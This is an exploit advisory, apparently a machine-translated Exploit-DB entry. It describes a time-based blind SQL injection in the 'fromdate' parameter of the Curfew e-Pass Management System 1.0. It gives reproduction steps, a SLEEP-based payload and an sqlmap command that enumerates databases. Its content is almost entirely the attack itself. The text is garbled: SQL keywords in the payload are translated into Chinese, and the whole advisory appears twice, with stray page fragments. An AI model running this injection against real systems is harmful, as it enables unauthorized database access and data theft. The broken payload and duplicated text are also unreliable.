#利用title:宵禁电子通行管理系统1.0-源
注射
#日期: 28/9/2023
#利用作者: PUJA DEY
#供应商homepage: https://phpgurukul.com
#软件link:
#版本: 1.0
#在: Windows 10/wamp上测试
1)登录到应用程序
2)单击通行证报告,然后以burpsuite捕获请求
3)参数“ fromdate”很容易受到SQL注入的影响
参数:#1*((自定义)帖子)
Type:基于时间的盲人
title: mysql=5.0.12和基于时间的盲人(查询睡眠)
payload: fromdate='and(从(select(sleep(5)))kdfl中选择6290)和
'sozq'='SozqTodate=submit=
4)将“*”放入参数的值中,然后将项目保存为cpme
5)运行sqlmap -r cpme -batch -dbs -random -agent
注射
#日期: 28/9/2023
#利用作者: PUJA DEY
#供应商homepage: https://phpgurukul.com
#软件link:
正在加载...
phpgurukul.com
#在: Windows 10/wamp上测试
1)登录到应用程序
2)单击通行证报告,然后以burpsuite捕获请求
3)参数“ fromdate”很容易受到SQL注入的影响
参数:#1*((自定义)帖子)
Type:基于时间的盲人
title: mysql=5.0.12和基于时间的盲人(查询睡眠)
payload: fromdate='and(从(select(sleep(5)))kdfl中选择6290)和
'sozq'='SozqTodate=submit=
4)将“*”放入参数的值中,然后将项目保存为cpme
5)运行sqlmap -r cpme -batch -dbs -random -agent